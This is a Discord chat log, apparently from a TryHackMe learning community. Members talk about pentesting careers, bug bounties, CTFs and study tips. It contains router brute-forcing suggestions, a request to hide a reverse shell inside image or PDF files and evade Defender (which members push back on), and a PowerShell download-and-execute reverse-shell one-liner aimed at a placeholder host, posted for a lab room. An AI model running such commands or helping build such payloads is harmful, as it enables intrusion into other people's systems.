#general

1 messages · Page 933 of 1

whole yew
#

Please don't help with coursework - even suggesting things could violate the honor code of that school, and we cannot verify that they are able to ask for help with any part of the assignment.

sand mason
#

my b bro

crude rivet
#

Thanks for suggestions though atleast @sand mason

twin ridgeBOT
#

Gave +1 Rep to @sand mason (current: #1344 - 3)

royal eagle
#

Does anyone know how to hack into router? I am trying to hack into admin access of my home router without knowing the password. I have tried few stuff but nothing seems to work. If anyone knows any good source i can follow then can you recommend it to me?

whole yew
#

If it's your router, you can factory reset it.

civic egret
#

Ffuf would also work

whole yew
#

If it's a leased router from the ISP, you are probably not legally allowed to ahck it

royal eagle
royal eagle
whole yew
#

Unless you are confident in your wordlist, bruteforcing is a waste of time.

sand mason
#

didn't work as in the password wasn't in the wordlist, or that it wasn't properly processing?

#

is it a login page or like a http auth user type deal?

royal eagle
sand mason
#

any other vectors would be based off recon and enum for that specific system

royal eagle
whole yew
#

That's not going to help with your router bruteforce, unless the password is actually in there.

sand mason
#

cat rockyou.txt | grep "<password-goes-here>"

whole yew
#

For using a tool like hydra, the password actually has to be in the list you use. If you picked a strong password, the likelihood that it's in rockyou is very very very low.

sand mason
#

or just add it in the top of the list/in a new file and try it where you know the password is in the list

#

other than that, you would have to do some type of a ruleset, like wordlist + mapping for more advanced brute forcing

#

changed the wifi password to asdf8842 to play around with that before
(note: that wasn't the password, tho same format)

rapid merlin
#

chat when i say to my friends that i am into cyber security, they ask me to hack their ex's account 😭😭

#

what should i say

whole yew
#

That it's illegal, and a violation of the account TOS.

sand mason
lunar pivot
#

i always wanted to know, is there vulnerability exist in big companies to exploit and gain access

whole yew
# lunar pivot but is it really possible?

It's not a good area to explore. When you use those internet services, you don't actually own the account. It's not really yours. The TOS you agree specifically prohibits trying to access the account that way.

proven lark
#

hey guys

#

anyone here good with bloodhound?

lunar pivot
sand mason
#

it happens but it's not common

whole yew
sand mason
#

also he was working within defined and legal scope, as I should probably point out

lunar pivot
#

Yeah i wont do it, im more interested in bug bounties

#

and also, lets say if i learn to hack by some way, if i try it out on my account would it still be illegal

whole yew
#

Step 1 to bug bounty: Make sure the company has a bug bounty program.
Step 2: Obey the rules of the bug bounty, including scope.
Step 3: ????
Step 4: repeat.

whole yew
#

Yes. It would still be illegal.

lunar pivot
#

Ohhkay

lunar pivot
#

and yeah one more question, i have mac, but i wanna do pentesting?

lunar pivot
#

so should i use vmware fusion pro for parrotos/kali or mac is safe

sand mason
# lunar pivot Ohhkay

only hack your own hardware/software that you have full rights to. if it's online, you don't own it and 99% don't have explicit permission (sans tryhackme/hackthebox)

drowsy dust
#

HackerOne is my favorite out of the two

proper sable
lunar pivot
#

are this for bug bounties? or vulnerability research

proper sable
#

they put my bug as a dupe when it's not possible for it to be one

proper sable
#

also good vulnerability research

whole yew
lunar pivot
#

ohhhkayy

sand mason
sand mason
#

hacker101 i think

proper sable
#

if you mean as your own company that is kinda skethcy

whole yew
proper sable
#

bug bounty is literally web pentesting

whole yew
#

It's related but it's not quite the same thing.

sand mason
#

i get what juun is saying, like you're not looking to actually get full blown shell in bug bounty

whole yew
#

I'm involved with setting up bug bounty processes at the current company I work for, and I lead our pentest team. I also liase with our 3rd party pentest vendors - the rules are different

sand mason
#

at the most a PoC RCE

proper sable
lunar pivot
#

is mac good for learning pentesting and other tools

#

or a vm will be requierd for linux

proper sable
#

you can pentest solely on windows if you want

lunar pivot
#

ohhkay

lunar pivot
whole yew
#

I would still recommend using a VM for all your pentest activities though. Whichever OS you test from, it's a somewhat common deliverable to hand over the VM image to the client. Wholly dependent on whether the client wants that as a value-add to the engagement.

proper sable
sand mason
#

DVWA and metasploitable are great for learning. Or BWAPP too

whole yew
lunar pivot
#

like, jr pentesting, web penting, addvanced web pentesting then red teaming

proper sable
lunar pivot
#

thats the path in that?

#

will i miss something important from this

proper sable
whole yew
#

Second the portswigger once you have some knowledge. If the phrase 'CIDR notation' or 'IDOR' don't make sense, you probably aren't ready for pentest.

sand mason
#

not msfconsole

whole yew
#

I've used metasploit in engagements. Not for webapp, but for network and other services.

proper sable
lunar pivot
#

any playlist?

sand mason
#

i suppose you could use msfconsole tho. if it works it works, right?

proper sable
whole yew
#

I'll add that I don't use it every engagement, and it's kind of a swiss army knife of a tool. It does a little bit of everything, but it makes certain things more difficult than they need to be. But it's a decent enough starting place.

proper sable
#

some are kinda old, but its mostly conceptual and expalanation

lunar pivot
#

if im sure bug bounties are for web pentesing only right?

drowsy dust
#

This chat is nice

proper sable
#

some are hardware based

#

or app based

#

90% of the time they are web

whole yew
#

Depends on the program, and what's in scope. You have to read the scope very carefully.

proper sable
#

some of them are just stuff like code review

spiral dagger
#

hello everyone

#

can anyone suggest me how to gain experience in cybersec becoz no company want to give job for fresher cybersec guy

opaque flax
#

get into cybersec

fossil merlin
fossil merlin
whole yew
# fossil merlin What are the differences?

Bug Bounty doesn't usually allow actual penetration into the target system beyond surface level. In most (but not all) BB programs, if you actually get a shell you have gone way beyond a simple demonstration of the vulnerability

#

Targets are also much more rigidly defined in bug bounty, with much less flexibility on scope.

spiral dagger
fossil merlin
#

Ok that makes sense

rocky bay
#

hi

opaque flax
spiral dagger
#

i am totaly confuse in my life !

opaque flax
#

It’s the entry level it job

#

I guess being a field tech is also another entry level it job

drowsy dust
#

Data entry

opaque flax
#

I wouldn’t consider data entry an IT job

rapid merlin
rapid merlin
rapid merlin
# opaque flax I wouldn’t consider data entry an IT job

If you have to have Technical Experience in IT to get a data entry position I'd consider it an IT position; Especially when it's in the context of a helpdesk, or any administrative role where you're a Data Entry Professional or wtv. I'd consider it an IT job.

#

Should I make any type of project college.
Does anyone have any idea about what type of project.

#

I think people forget there are multiple areas of IT. Not everyone is doing the hands on stuff. Sometimes you're just answering phones and helping those who are less technical operate their equipment. (Speaking in a HelpDesk Position GENERALLY speaking in Level 1 Support Role)

It all depends on what your role is within the company. People have their places, don't let someone deter you from applying to a data entry position.

#

And I wouldn't call that "IT" but it still counts as it somehow. (I know it's the premise but I find it mind blowing that sometimes simple explainations can be regarded as an IT service)

steady pewter
rapid merlin
steady pewter
#

but uh yeah, sometimes it's fun.

rapid merlin
#

People don't understand what they want, It's a position you have to really be interested in.

#

I would love to be doing that back and forth

#

😭

steady pewter
#

For example you can work on laptops and various computer systems, one time I even helped build a bunch of computers for a company.

rapid merlin
steady pewter
#

at least in my opinion.

rapid merlin
#

or just assemble?

steady pewter
#

Actually a bit of both.

rapid merlin
#

Either way it's still fun

#

Building workstations is the best 😭

steady pewter
#

But running wire, oh that's a whole different story.

rapid merlin
#

😭

#

yeah that's fun..

steady pewter
#

being there all day, from morning to dusk.

rapid merlin
#

Wait until you have to relace it kek

steady pewter
steady pewter
#

..which is bound to happen eventually.

#

gn everyone

rapid merlin
rapid merlin
#

all though that is quite fun, I'm sure it's hilarious to see the last person's unorganization 😭

wet marlin
#

ayoo new day new me

#

good mornin

marble niche
#

gm

#

hyd

#

bruh on the website it says im apprentice

near sapphire
#

reverify

#

or wait for the bot

cedar hearth
#

afternoon!

pliant bronze
#

I wanna learn something that i haven't, Can anyone teach me something that could be too beneficial for me to learn .. Umm?

cedar hearth
#

I recently was studying on how to learn effectively on cybersecurity and I was curious on how you guys study it.

pliant bronze
cedar hearth
#

yeah

#

i guess

#

but I speaking study techniques

#

I was learning on effective study techniques for cybersecurity and it made me stop using notes

#

so I was curious on how other people study and what techniques they use

rapid merlin
olive lance
#

anyone can tell me ....how to solve ctf ....any write ups for beginners ? @cedar hearth

rapid merlin
#

then i write it on paper 12 times till it becomes engraved im my head and its the onlything i dream abut

cedar hearth
#

oh interesting

rapid merlin
#

after that i think like im some greek philospher about twtf i learned the day before

#

then i move on

cedar hearth
#

huh

#

i guess so

#

typically I dont write on paper because it makes you forget faster

rapid merlin
#

i passed my oscp cuz of it :/

cedar hearth
#

oho

#

interesting

rapid merlin
rapid merlin
cedar hearth
#

yeah

rapid merlin
#

i cant talk to women anymore

cedar hearth
#

im a women

#

trustme

rapid merlin
cedar hearth
#

oh

#

yeah no dw

olive lance
#

hey mori

rapid merlin
#

hi

olive lance
#

can you tell me ...how to solve ctf ?

#

any write ups for beginners

rapid merlin
cedar hearth
#

the reason why I think writing on paper is bad is because when you remember the knowledge and write it down you kinda let go of remembering it.

rapid merlin
#

read the question

#

once you read it

#

try seeing what it wants

cedar hearth
rapid merlin
#

then spend 1 hour googling what to do to achieve your goal

cedar hearth
#

the tryhackme AI gives pretty good tips

rapid merlin
#

ai is bad

#

haram

cedar hearth
#

oeuf

#

oui

rapid merlin
#

its good if youre lazy

#

otherwise dont use it

cedar hearth
#

im lazy making flashcards

rapid merlin
pliant bronze
twin ridgeBOT
#

Gave +1 Rep to @primal obsidian (current: #2729 - 1)

rapid merlin
#

idk i just read stuff

pliant bronze
rapid merlin
#

dont waste ur time on thm ig

#

cuz i barely learned anything

pliant bronze
cedar hearth
rapid merlin
cedar hearth
#

makes sense lmfao

#

i got premium and it works fine

pliant bronze
olive lance
rapid merlin
rapid merlin
#

i worked very hard

#

im failing school rn

pliant bronze
rapid merlin
pliant bronze
rapid merlin
#

but then thats only entry

pliant bronze
rapid merlin
#

become an illegal APT or smth??

pliant bronze
pliant bronze
pliant bronze
rapid merlin
#

?

pliant bronze
# rapid merlin ?

I guess just leave the personal problems... BTW can you teach me something that i can't learn somewhere else ?

pliant bronze
rapid merlin
#

and dont use ECB ever

#

use GCM or CCM

wraith fjord
rapid merlin
#

and cipher streams are faster than block streams

pliant bronze
rapid merlin
rapid merlin
rapid merlin
#

there you basically got your crypto basics on hardening ig

rapid merlin
#

beware

pliant bronze
pliant bronze
rapid merlin
pliant bronze
rapid merlin
#

vmware is cool

#

i dual boot cuz im boss

pliant bronze
rapid merlin
#

ok

pliant bronze
pliant bronze
rapid merlin
#

you will always be forced down a road

#

its natural

pliant bronze
rapid merlin
#

idk what to say

#

and im bored

#

and im dehydrated

pliant bronze
rapid merlin
pliant bronze
rapid merlin
#

youtube it or smth

pliant bronze
rapid merlin
#

vmware is well documented so gpt might help

pliant bronze
rapid merlin
#

ok ima go goon to some lang internls

#

bai

pliant bronze
proven lark
#

can someone help witha bloodhound analysis

rapid merlin
#

Someone think of an excuse for me

#

My family are trying to get me to go there today and I don’t wanna go

granite echo
#

Does anyone know at what difficulty level SAL1 is compared to the SOC Simulator challenges?

Say for example, will it have alerts from easy, medium and hard, or only easy and medium?

sick lance
#

You'll be using the Soc Ssim, take from that what you will.

obtuse swift
#

how can i join general vc it's locked

sharp citrusBOT
void thunder
blissful zodiac
#

Hi, I’m currently studying for the CompTIA Security+ SY0-701 exam using the CompTIA Security+ SY0-701 Certification Guide by Ian Neil, along with the CompTIA Security+ Exam Prep app by Than Hung. To increase my chances of passing, I’d like to add another resource, but I’m torn between Professor Messer’s Notes + Exam package and Jason Dion’s Udemy course. Which one would you recommend and why? Thank you.

cloud quiver
chilly veldt
#

Gotta love when the burner dies

alpine aurora
#

moning all

#

what is the topic of the moning 😄

chilly veldt
#

Planned on taking the burner (phone in picture) with me to China, but guess it's dead :/

alpine aurora
#

looks like it need CPR

chilly veldt
#

Yeah, the devs of the OS looks like to have remote wiped it, guess I just gonna install a new OS on it

sick lance
#

Eh?

#

Graphene devs don't have the ability to remote wipe phones.

twin ridgeBOT
#

Gave +1 Rep to @cloud quiver (current: #1 - 3799)

blissful zodiac
sick lance
#

AFAIK, I don't think anybody does, as that would be really careless.

chilly veldt
#

It's some others that put their own stuff on top of graphene

sick lance
chilly veldt
#

It's a drug phone OS i reverse engineered, it uses a subscription base, and if your subscription has ran out for too long and they detect the phone being on afterwards they'll remote wipe it

sick lance
#

So it's the app that does it.

visual ether
#

Hi

chilly veldt
raw python
#

Hi! I'd like to participate in the Hackfinity Battle 2025 but I don't have a team! Anyone need a rookie for their team?

sick lance
sonic plover
#

Do BTL1 holders get to do SAL1 for free? 👀

sick lance
#

Yup, with restrictions.

sick lance
#

All information is in the post.

chilly veldt
sick lance
chilly veldt
#

Especially since I have had it turned on past subscription before where nothing happened

rapid merlin
#

SYN'in til I ACK 🗣️ 💯

wooden totem
#

I cast firewall! 🧙‍♂️ 🔥

sick lance
#

You just burned my securityOnion,

It was super effective.

sturdy pike
#

Scrubz's character development needs to be studied

hazy flume
#

Is there anyone here who knows how to embed an cmd/ps/javascript/python reverse shell script that is executable into an jpg/png/pdf file ?

sinful bobcat
#

Scope of it ?

hazy flume
#

Stega something

sinful bobcat
#

Is it for THM ?

hazy flume
#

Hey scrubzzz

sinful bobcat
hazy flume
#

How you doin man

#

You are a significant internet figure for me

sick lance
#

Hopefully for the right reasons. 😅

hazy flume
#

You help me advance and finish the first 3 modules and I got a job

#

But this is private project that I try now

sick lance
hazy flume
#

I figured how to sort the port forwarding problem when trying to reverse shell outside of my local network , it works . And for educational purposes I want to check if I can make it work also when the script is being transferred as a jpg/png/pdf file

sinful bobcat
#

Is it going to run on a computer or a server ?

hazy flume
#

On my windows VM

#

Or my windows host

#

From listener in Kali

sinful bobcat
#

You may need to "fake" the png/jpg/pdf file, I'm not sure if you can run an executable from an image itself

hazy flume
#

I tried macros with pdf files but even with all defender off on windows , it is still alerting

lament igloo
#

Hey i'm new here

sinful bobcat
#

If you are trying to bypass windows defender this is another story, and I'll not help on that

hazy flume
#

I know there are ways to make it executable from image or pdf, I watched some online tutorials but they didn’t work

#

No im not trying to bypass it I already did, I am trying to make the working script being executed after op wining the image

#

After opening *

sinful bobcat
#

The executable will still be blocked from windows defender I think

#

Or at least, it should

hazy flume
#

No because the script itself is creating a cmd file that is creating a powershell file that executes itself therefore no need to downgrade ps execution policy

#

This I checked

sinful bobcat
#

Idk man this smells more and more like maldev and not a simple project

hazy flume
#

It’s for learning

sick lance
#

Yeah, for tips and tricks on how to bypass defender, this is considered an advance topics,

sharp citrusBOT
proper sable
#

it's complicated

#

polyglots also exist and may be useful

sick lance
#

Before going further, please respect rule 9.

sinful bobcat
#

If a pdf runs doom, it can run anything lol

hazy flume
proper sable
#

can i get access to advanced channels if i have a cyber talk

#

that i presented

sinful bobcat
proper sable
sick lance
#

That would be the discretion of Jabba.

naive violet
hazy flume
#

my job is paying me for OSCP scrubz

#

to do it

sinful bobcat
sick lance
sinful bobcat
proper sable
hazy flume
#

i have BSCP of burp

#

from work

proper sable
#

also OSCP is windows?

hazy flume
#

i heared OSCP is much harder

proper sable
#

if so i'm pretty sure id fail OSCP but would pass OSWE

hazy flume
#

oscp is by offsec

#

i am not ready for oscp yet

naive violet
proper sable
hazy flume
#

its a 24 hours exam

#

5 machines

#

if you fail the AD machine you fail the exam

proper sable
sick lance
#

Top tip, (Not that I have OSCP)

Manage your time, and take breaks.

proper sable
#

@near sapphire Hello!

#

i see you lurking patrickconcern

near sapphire
proper sable
near sapphire
proper sable
#

my nitro was gifted to me

sick lance
proper sable
#

i gotta finally work on that project i've been meaning to do

near sapphire
proper sable
#

and hate myself doing it

proper sable
hazy flume
#

and in work they open me the OSCP libraries with more people and we learn together

proper sable
#

@sick lance is maldev still maldev if its ethical and safe? what classifies as maldev

naive violet
proper sable
#

i could grind out thm but lazy

neat pond
#

i am to :{

#

but for now only

proper sable
neat pond
#

everything :} about cybersecurity and computers

rapid merlin
#

Good morning everyone!

sick lance
#

Nano isn't on SO by default,

yay for vim

void thunder
neat pond
proper sable
neat pond
#

i dont know why but i loove it

sick lance
#

Probably best asking a moderator or admin about that. not a community member who's just here, and as James pointed out, if you have to ask...

void thunder
whole gazelle
neat pond
#

hi

#

guys who started with programming lang first in cyber ?

proper sable
proper sable
#

you will thank me later

neat pond
#

did you start with that

proper sable
#

i started with javascript and i regretted it

neat pond
neat pond
proper sable
#

Javascript,python are the easy get into cyber languages

neat pond
proper sable
#

but learning C/C++ teaches you fundamentals about comp sci, which makes learning new languages easier

neat pond
#

not only know how to work

void thunder
# proper sable better malware-analysis on vm detection malware

As long as you're using it ethically, within legal regulations, and for legitimate reasons, it would generally be considered ethical malware development. However, you should always obtain proper authorization before deploying such software, unless otherwise explicitly permitted

proper sable
#

you'll look at js and python and think they are terrible but will deeply understand them

neat pond
#

now i learn python and its soo easy cuz i learned C before

proper sable
neat pond
#

but in the first i will have some problems right with writting scrips

proper sable
#

learning a new language after the first one is just syntax

neat pond
#

after that fellings will gone right

proper sable
#

i went from js -> python -> go -> c++ and it was horrible

heady parrot
#

Free wo

#

Rm

fringe nacelle
#

I started off with Python. I might pick up c++

proper sable
neat pond
fringe nacelle
proper sable
neat pond
fringe nacelle
proper sable
#

that's why opposite i feel is better low level to high level

#

concepts are hard to learn at first

#

but everything's easier

neat pond
proper sable
#

yeah it just takes time

neat pond
#

thank you dude for advices

proper sable
#

C/C++ is the foundation for like everything

#

so after that you good

neat pond
alpine aurora
neat pond
#

cuz it will help me in cyber so much

#

and i lvl up in daya structures

proper sable
#

make sure to learn about memory and stuff like that and not just scripting

neat pond
#

data

proper sable
void thunder
#

It's best to begin with the basics when you are first starting out, but than again it depends on your pathway

neat pond
near sapphire
#

chat should I spend the rest of my day tomorrow hacking or coding

proper sable
neat pond
#

and now to understand more everything i will finish it one time more

alpine aurora
near sapphire
proper sable
sick lance
#

Who's doing the new CTF?

#

I'm in two minds if I should take part or not, (bonus I'm a student).

proper sable
neat pond
#

can we solve CTF,s if we start new in cyber ?

near sapphire
proper sable
alpine aurora
sick lance
neat pond
void thunder
neat pond
#

ok

proper sable
true urchin
#

Does anybody need one more student in their team for the hackfinity Battle?

proper sable
# neat pond really

they teach you new concepts and technologies etc, and you have to learn on the fly

true urchin
twin ridgeBOT
#

Gave +1 Rep to @sick lance (current: #2 - 3492)

alpine aurora
proper sable
near sapphire
sick lance
proper sable
#

the thm one is going on idk for how long that's a scrubz question

neat pond
#

i will look at that and come back

alpine aurora
#

the CTF is not for my skills yet im to new in this

near sapphire
#

it is beginner friendly

proper sable
alpine aurora
proper sable
#

if you don't know how to do it research as much as you can until you get it

proper sable
neat pond
#

this one

proper sable
#

watch your place go up

proper sable
near sapphire
neat pond
#

after i learning more i will chose team to .....

alpine aurora
#

@proper sable if ther is a dude the need a padawan im on 😄

proper sable
#

i know it's a star wars reference but never seen 😭

mellow narwhal
#

I'm excited for the cloud challenges

alpine aurora
# proper sable ?

if ther is some the like to be my teacher then i like to be the student

mellow narwhal
#

I have zero experience in those so I won't get them, but it'll be fun anyway

proper sable
#

might have to participate just for cloud stuff.......

#

i need an excuse to learn cloud

near sapphire
#

i have 0 experience on aws hacking

#

actually i have no experience in aws whatsoever

proper sable
#

only experience i have on aws hacking is cognito cloud identities

alpine aurora
proper sable
alpine aurora
sick lance
#

Onion will know pain, for it no longer makes me cry by refusing to work!

alpine aurora
#

T -1day for my 3d printer is comeing home

sick lance
sick lance
pseudo egret
sick lance
#

With threat detection.

pseudo egret
#

hmm that's great

#

i thought it would be linked with tor

sick lance
#

I don't use tor.

pliant bronze
#

BTW.. how can i join that general vc.?

sick lance
#

You need to verify your account

sharp citrusBOT
pliant bronze
sick lance
#

Above link.

pseudo egret
pliant bronze
twin ridgeBOT
#

Gave +1 Rep to @sick lance (current: #2 - 3493)

worn turret
#

Im now a networking nerd

whole gazelle
#

nice! 😊

chilly veldt
#

Boarding in 20 minutes

near sapphire
chilly veldt
#

Thankz

alpine aurora
#

do we have a channel just for CTF

pseudo egret
worn quarry
#

Hey guys,
I’m a beginner pen tester from Egypt, and I’m looking to put together a small team to learn Pen Testing together, grind, and improve. The idea is simple: practice, hunt for bugs, do CTFs, and just keep getting better, learning on tryhackme website.
If you’re down to build something solid and actually put in the effort, hit me up. Let’s see where this takes us. 🔥

pseudo egret
alpine aurora
pseudo egret
#

you can customize your channels

alpine aurora
#

cool how 😄

pseudo egret
alpine aurora
pseudo egret
#

there will be option for it

alpine aurora
alpine aurora
pseudo egret
alpine aurora
pseudo egret
alpine aurora
#

@pseudo egret look like i need candy to eat and some more coffe

dusty thicket
#

helloo

alpine aurora
#

@dusty thicket hello ther

dusty thicket
#

what you doin

pseudo egret
#

it would be fun

alpine aurora
#

brb need to go shoping

pseudo egret
dusty thicket
#

@pseudo egret

#

can you turn your mic in dc

#

??

pseudo egret
#

if you want hop in to dm

dusty thicket
#

mine says surpressed

#

aight

#

add

#

me

alpine aurora
chilly veldt
alpine aurora
pseudo egret
chilly veldt
pseudo egret
#

yo any from india ?

summer latch
pseudo egret
alpine aurora
#

hehe i love the rulles on CTF ( you most not do that and that ) hmm all of that i dont know how to hehe soo that is the easy part 😄

boreal scarab
#

@gray sonnet @sturdy pike

boreal scarab
#

This one

rapid merlin
#

Hi..

boreal scarab
#

Yo

rapid merlin
#

Exiftool on Linux is not precise. I try cat it's more advanced

sick lance
rapid merlin
#

ad enumeration romm in thm , openvpn file is tweaking rn

#

not able to connect

sturdy pike
rapid merlin
#

openvpn redad.ovpn
2025-03-09 19:11:42 Note: --cipher is not set. OpenVPN versions before 2.5 defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers.
2025-03-09 19:11:42 Note: cipher 'AES-256-CBC' in --data-ciphers is not supported by ovpn-dco, disabling data channel offload.
2025-03-09 19:11:42 OpenVPN 2.6.13 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO]
2025-03-09 19:11:42 library versions: OpenSSL 3.4.1 11 Feb 2025, LZO 2.10
2025-03-09 19:11:42 DCO version: N/A
2025-03-09 19:11:42 OpenSSL: error:0480006C:PEM routines::no start line:Expecting: CERTIFICATE
2025-03-09 19:11:42 OpenSSL: error:0A080009:SSL routines::PEM lib:
2025-03-09 19:11:42 Cannot load inline certificate file
2025-03-09 19:11:42 Exiting due to fatal error

sturdy pike
#

root privileges

rapid merlin
rapid merlin
#

I just start hacking I think 1 month ago

sick lance
pine stratus
#

hi , i have a question , the data moves from layer 7 to 1 after before transmission via L1 . how the three way handshake occurs jn transmission layer , before Network layer where you should know the ip adress of the remote host?

#

are layers work together or work in order ;( im struggling in understanding :D

#

or im wrong in all what i said 😂

naive violet
#

For a website, for example, you know the URL
The URL is broken down into a hostname
The hostname is resolved with DNS into an IP
HTTP request is sent to the IP+port

alpine aurora
crystal wyvern
#

hey, does anyone have suggestion for challenges to complete after finishing the cybersecurity 101 path?

void thunder
# pine stratus hi , i have a question , the data moves from layer 7 to 1 after before transmis...

Transmission begins at Layer 7 (Application) and moves down through each layer to Layer 1 (Physical). When using TCP, the three-way handshake occurs at Layer 4 (Transport); here, the client sends a SYN packet to the server, the server replies with a SYN-ACK packet, and the client responds with an ACK packet to establish the connection. While the process "moves down through each layer" it's more accurate to say that the layers work together rather than in a strict order to transmit data

crystal wyvern
#

thanks :)

loud marlin
#

murica ppl

pine stratus
twin ridgeBOT
#

Gave +1 Rep to @naive violet (current: #3 - 2266)

dawn grove
#

I have a question, would you suggest moving onto the OpenVPN setup instead of Attack Boxes from the beginning or am i gonna incounter configuration issues on my kali? I mean, are there going to be lots of problems or is already set up for these kind of things??

#

I know i got the tools but maybe they got to be configured

cloud quiver
dawn grove
#

Alright, i've just done the metasploit introduction room on my own kali since it needs just some simple research for the tasks and it's a whole different story since metasploit loaded in less than 5 minutes coolguy

open wharf
#

hello

dawn grove
#

Hi man

whole gazelle
#

hi hello hello

#

it's me

dawn grove
#

Btw i have another thing, it's not THM related but on kali linux when i'm in discord and streaming my screen the audio gets all stuttering to the point where i cant hear nothing, has anyone had this problem before? On windows i havent got such problem and i dont know what could be causing it..

whole gazelle
#

purple guy from the bite of '87

wind berry
#

anyone knows about sha1 hash collision words

dark mason
#

can't wait for the CTF to start\

void thunder
inner bloom
dawn grove
cloud quiver
void thunder
hollow nebula
#

hey anyone know what vocabulary i should be using to to think of a list of common applications and services found during penetsts? things like jenkins, drupal, tomcat, etc?

silver niche
#

do you recommend me that i install gawk?

dark mason
#

in about a week

void thunder
hollow nebula
#

computer media services?

mossy river
#

content management system

hollow nebula
#

ahhhh

#

i've been trying to take pretty good notes for all these boxes and such i've been doing - it's good , in my opinion, to have some of these baddies ready to go

snow igloo
#

I love Tryhackme Thank you so much for giving as this great gift of accessible knowledge well created.

hollow nebula
#

thank you badbunny for your musical contribution

#

and a que lo que to you good sir

proven quartz
blazing granite
proven quartz
blazing granite
sand trench
#

t minus 200 days

leaden marsh
#

Wow Nicccee

blazing granite
#

I used to do tech support for a lot of old people, and then when I finished work, my mum used to call me with tech issues 😛 Actually is not that hard if you know how to guide them, ironically I had more success with old people than with young people. Young ones think they know everything and don't follow your instructions, if you know so much what the f you contact us 😂

grizzled wing
leaden marsh
#

0XE
Expert right?

grizzled wing
#

Guardian

blazing granite
#

🥦

grizzled wing
#

🦖

loud marlin
leaden marsh
whole gazelle
leaden marsh
#

I just end 49 rooms

cloud quiver
grizzled wing
#

SCaLE talk, misinformed

cloud quiver
whole gazelle
sand trench
sick lance
grizzled wing
#

haha streak -3

whole gazelle
leaden marsh
grizzled wing
grizzled wing
rapid merlin
sand trench
sick lance
frosty thunder
#

is hackfinity starting on the 17th?

sick lance
#

If that's what the event says.

whole gazelle
#

lmao

grizzled wing
blazing granite
grizzled wing
alpine aurora
#

what do you think of shellgpt

grizzled wing
#

no thoughts

sand trench
#

anyone know where shadow can source some indium

#

wanna try chewing it

upper badge
#

Hey everyone!

leaden marsh
#

I can tell u something everyone

#

I lvu💕 u are beautiful u Are smart u are greatest

#

U are THE BESST ONE

topaz topaz
sturdy pike
#

🥦

leaden marsh
#

This for u everyone

blazing granite
alpine aurora
sturdy pike
twin ridgeBOT
#

Gave +1 Rep to @leaden marsh (current: #2729 - 1)

topaz topaz
chilly veldt
#

Totally forgot that this trip is on company card, plane wifi!!!

grizzled wing
#

wifi )))

#

🛜

sturdy pike
#

🥦

grizzled wing
#

🍪

sturdy pike
#

how are you doing sudo?

chilly veldt
#

First time flying Qatar airways, I like it

blazing granite
#

🍪

rapid merlin
#

i am true sudo

grizzled wing
#

staying warm like these mice

#

mammoth genes

sturdy pike
leaden marsh
sturdy pike
rapid merlin
#

i am sudo hex

leaden marsh
#

I will sleep with them

#

I will put my head on them

grizzled wing
mossy river
grizzled wing
rapid merlin
leaden marsh
#

And then feel warm to my head

#

😁💕

mossy river
leaden marsh
#

I will put them in my blancket

sturdy pike
leaden marsh
#

💕😁 .

grizzled wing
placid idol
#

It's always hectic, studying and stuff

rapid merlin
placid idol
#

🥱 I'm sleepy

leaden marsh
placid idol
#

Later everyone, wanted to talk but can't today

mossy river
chilly veldt
#

Jabba

grizzled wing
chilly veldt
#

I am bored

rapid merlin
twin ridgeBOT
#

Gave +1 Rep to @mossy river (current: #6 - 1520)

grizzled wing
mossy river
grizzled wing
chilly veldt
grizzled wing
#

ocean socks

sturdy pike
#

Jabba I'm stressed

#

about jobs

sturdy pike
mossy river
grizzled wing
#

Jabba != Jobba

sturdy pike
#

Jobba I'm stressed

main tiger
# sturdy pike about jobs

I was speaking to a friend of mine who was applying for a tier 1 SOC analyst role and they had people with 5 years of exp applying

grizzled wing
#

haha

sick lance
main tiger
#

I am unaware how it is in other countries

sturdy pike
sturdy pike
grizzled wing
#

🌏 <--- you live here

sturdy pike
#

Who knows, it might be the cookie land too

grizzled wing
#

be the tough cookie we all hear about

blazing granite
sturdy pike
#

And share where I live? Or stop stressing out?

grizzled wing
blazing granite
blazing granite
grizzled wing
#

listening to Flock of Seagulls - I Ran since the Flocker user was in chat

#

think my comment went over their head

loud marlin
#

OWASP juice shot does not exits as VM alone ?

grizzled wing
#

👻 is typing

plush forge
#

I would like a tool for turning an http request into something I can use with JavaScript's fetch . Like, take a request From the browser, and make The request object you need to give fetch

grizzled wing
#

npm has such tools, think one is cereal ?

polar anchor
#

How long do you think it would take to learn and understand most of coding?

plush forge
grizzled wing
#

depends

cloud quiver
plush forge
#

I want something to pull into My own code

grizzled wing
#

extensions

#

burp extensions have js

plush forge
plush forge
grizzled wing
grizzled wing
#

link to creating your own extensions

plush forge
#

Huh, I'd really guessed there's be any tools at all for what I need

grizzled wing
#

there likely is, but you said you wanted to code your own or use your code

plush forge
#

No

#

I mean that, for My own code, I need a request in a specific format

#

I need a tool to turn a request into that format

topaz topaz
#

I look at some really easy CTFs that require even the slightest amounts of javascript and legit feel so overwhelmed as I have no idea about that programming language, makes me understand how far I still have to reach.. How do you guys deal with this overwhelming feeling? I'm sure no matter how far this trip goes it still feels the same

plush forge
topaz topaz
plush forge
plush forge
topaz topaz
twin ridgeBOT
#

Gave +1 Rep to @plush forge (current: #2729 - 1)

plush forge
hollow nebula
#

"powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port " obviously i have the doodads filled in but i'm getting the response that 'INvoke-PowerShellTcp is not an internal or external cmdlet ?

dark mason
#

I hate geometry so much

hollow nebula
#

get a nishang script onto jenkins, then have jenkins invoke it

#

got the script on there via a http.server

dark mason
#

THM team has big plans

hollow nebula
#

even other walk throughs i've seen all have the same command..tried Invoke-Item , etc other cmdlets..nothing working. gonna take a break and try again from the beginning later

#

dude i didn't +x the script

hollow nebula
#

re-doing the jenkins room after several months away from the keyboard

#

been working on this exploit for like an hour - and realized i didn't chmod +x the script

sick lance
hollow nebula
#

totes ma gotes forgot i can use the search too to find specifics

boreal scarab
#

Random Chinese dude sends me a text, no idea what it said, or who it's from.. guy asks:

"Are you free to go eat Korean food with me tomorrow at noon?"

sick lance
#

Well, don't be rude, are you?

loud marlin
#

will be rude from you if not

boreal scarab
#

I remember a random text, something along the lines of

Rando: "Hi I'm X, how are you?"
Me: "Fine"
Rando: "You're very kind, how old are you?"
Me: "Classified"
Rando: "Whats your name?"
